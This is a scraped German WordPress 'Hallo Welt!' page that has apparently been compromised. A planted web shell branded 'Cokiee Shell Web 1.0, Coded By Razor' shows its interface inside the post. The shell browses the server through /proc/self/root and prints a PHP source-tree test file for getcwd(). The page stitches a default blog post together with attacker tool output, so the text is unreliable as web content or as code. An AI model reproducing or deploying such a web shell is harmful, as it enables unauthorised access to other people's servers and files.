Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/standard/tests/dir/ |
Current File : //proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/standard/tests/dir/getcwd_error.phpt |
--TEST-- Test getcwd() function : error conditions - Incorrect number of arguments --FILE-- <?php /* Prototype : mixed getcwd(void) * Description: Gets the current directory * Source code: ext/standard/dir.c */ /* * Pass incorrect number of arguments to getcwd() to test behaviour */ echo "*** Testing getcwd() : error conditions ***\n"; // One argument echo "\n-- Testing getcwd() function with one argument --\n"; $extra_arg = 10; var_dump( getcwd($extra_arg) ); ?> ===DONE=== --EXPECTF-- *** Testing getcwd() : error conditions *** -- Testing getcwd() function with one argument -- Warning: getcwd() expects exactly 0 parameters, 1 given in %s on line %d NULL ===DONE===
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare